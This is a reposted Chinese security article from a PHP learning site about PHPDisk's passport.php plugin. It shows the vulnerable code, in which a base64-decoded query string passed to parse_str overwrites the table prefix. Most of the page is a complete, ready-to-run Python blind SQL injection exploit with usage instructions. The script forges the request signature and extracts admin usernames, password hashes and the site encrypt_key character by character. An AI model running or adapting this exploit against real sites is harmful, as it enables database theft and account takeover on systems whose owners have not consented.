网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

phpdisk 盲注 &前台任意用户登录 - 网站安全 -

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] 代码审核文件 plugins\phpdisk_client\passport.php$str = $_SERVER[#39;QUERY_STRING#39;]; if($str){ parse_str(base64_decode($str));// 触发函数 }else{ exit(#39;Error Pa......

代码审核

文件 plugins\phpdisk_client\passport.php

$str = $_SERVER['QUERY_STRING']; 
  
if($str){ 
    parse_str(base64_decode($str));// 触发函数 
}else{ 
    exit('Error Param'); 
} 
/*$username = trim(gpc('username','G','')); 
$password = trim(gpc('password','G','')); 
$sign = trim(gpc('sign','G',''));*/
  
if($sign!=strtoupper(md5($action.$username.$password))){ 
    exit('No data,Code:2!'); 
} 
  
$username = is_utf8() ? convert_str('gbk','utf-8',$username) : $username; 
  
if($action=='passportlogin'){ 
  
    $rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1");  //覆盖tpf


phpdisk.py exploit

 

#=============================================================================== 
# Id :phpdisk.y 
# Author:Yaseng 
#=============================================================================== 
import   sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib 
  
def cslogo(): 
    print ''' 
  ___  ___  ____  ____  ____  __      __   _  _ 
 / __)/ _ \(  _ \( ___)(  _ \(  )    /__\ ( \/ ) 
( (__( (_) ))(_) ))__)  )___/ )(__  /(__)\ \  / 
 \___)\___/(____/(____)(__)  (____)(__)(__)(__) 
 Name:phpdisk bind sql injection  exploit 
 Author:Yaseng [yaseng@uauc.net] 
 Usage:phpdisk.py  site[www.yaseng.me]   id[1] 
''' 
  
# show message 
def msg(text, type=0): 
    if type == 0: 
       str_def = "[*]"
    elif  type == 1: 
       str_def = "[+]"
    else: 
       str_def = "[-]"; 
    print str_def + text; 
  
# get url data 
def get_data(url): 
    try: 
      r = urllib2.urlopen(url, timeout=10) 
      return r.read() 
    except : 
     return 0
def b(url): 
     if   get_data(url).find("ssport Err",0) != -1 : 
        return 0
     return 1
  
def make_plyload(payload): 
     return   target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())  
  
def get_username(): 
  
    msg("get  username ...") 
    global  pass_list 
    len=0
    for i in range(40) : 
         if  b(make_plyload("pd_users  WHERE 1   and   (SELECT  LENGTH(username)  from  pd_users where userid=%d )= %d  #" % (uid,i))): 
            len=i 
            msg("username length:%d" % len,1) 
            break
    global  key_list 
    key_list=['0','1','2','3','4','5','6','7','8','9'] 
    key_list+=map(chr,range(97,123)) 
    username="" 
    for i  in range(len) : 
       for key in key_list : 
            t=key 
            if type(key) != int : 
                t="0x"+binascii.hexlify(key) 
            if(b(make_plyload(" pd_users WHERE 1   and   (SELECT  substr(username,%d,1)   from  pd_users  where userid=%d )=%s #" % (i+1,uid,t)))) : 
             msg("username [%d]:%s" % (i+1,key)) 
             username+=key 
             break
    msg("username:"+username,1) 
    return  username  
  
def get_password():    
  
     pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'] 
     password="" 
     for i  in range(32) : 
        for key in pass_list : 
             t=key 
             if type(key) != int : 
                 t="0x"+binascii.hexlify(key) 
             if(b(make_plyload(" pd_users WHERE 1   and   (SELECT  substr(password,%d,1)     from  pd_users  where userid=%d )= %s #" % (i+1,uid,t)))) : 
              msg("password [%d]:%s" % (i+1,key)) 
              password+=key 
              break
     msg("username:"+password,1) 
     return password      
  
def get_encrypt_key(): 
  
    msg("get encrypt_key ...") 
    global  pass_list 
    pass_list=map(chr,range(97,123)) 
    len=0
    for i in range(40) : 
        if  b(make_plyload("pd_users  WHERE 1   and   ( SELECT  LENGTH(value)  from  pd_settings  where        vars=0x656e63727970745f6b6579 )=%d  #23" % i)): 
            len=i 
            msg("encrypt_key length:%d" % len,1) 
            break
    global  key_list 
    key_list=['0','1','2','3','4','5','6','7','8','9'] 
    key_list+=map(chr,range(65,91)+range(97,123)) 
    encrypt_key="" 
    for i  in range(len) : 
       for key in key_list : 
         t=key 
         if type(key) != int : 
            t="0x"+binascii.hexlify(key) 
         if(b(make_plyload(" pd_users WHERE 1   and   ( SELECT  binary(substr(value,%d,1))  from  pd_settings  where        vars=0x656e63727970745f6b6579 )  = %s #" % (i+1,t)))) : 
          msg("key [%d]:%s" % (i+1,key)) 
          encrypt_key+=key 
          break
    msg("encrypt_key:"+encrypt_key,1) 
    return  encrypt_key  
  
if __name__ == '__main__': 
  
   cslogo() 
   if len(sys.argv) > 1 : 
    site=sys.argv[1]; 
    global target 
    global uid 
    try : 
     uid=int(sys.argv[2]); 
    except : 
      uid =1
    target=site+"/plugins/phpdisk_client/passport.php"
    msg("exploit:"+site) 
   #print get_data(make_plyload(" pd_users WHERE 1   and   ( SELECT  substr(value,2,1)  from  pd_settings  where        vars=0x656e63727970745f6b6579 )  = 9 %23")) 
    if get_data(target) : 
       username=get_username() 
       if len(username) > 0 : 
         password=get_password() 
         if len(password) == 32 : 
            msg("Succeed: username:%s  password:%s" % (username,password),1) 
    else : 
       msg("vulnerability  not  exits",2); 
       exit();

使用演示



 

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论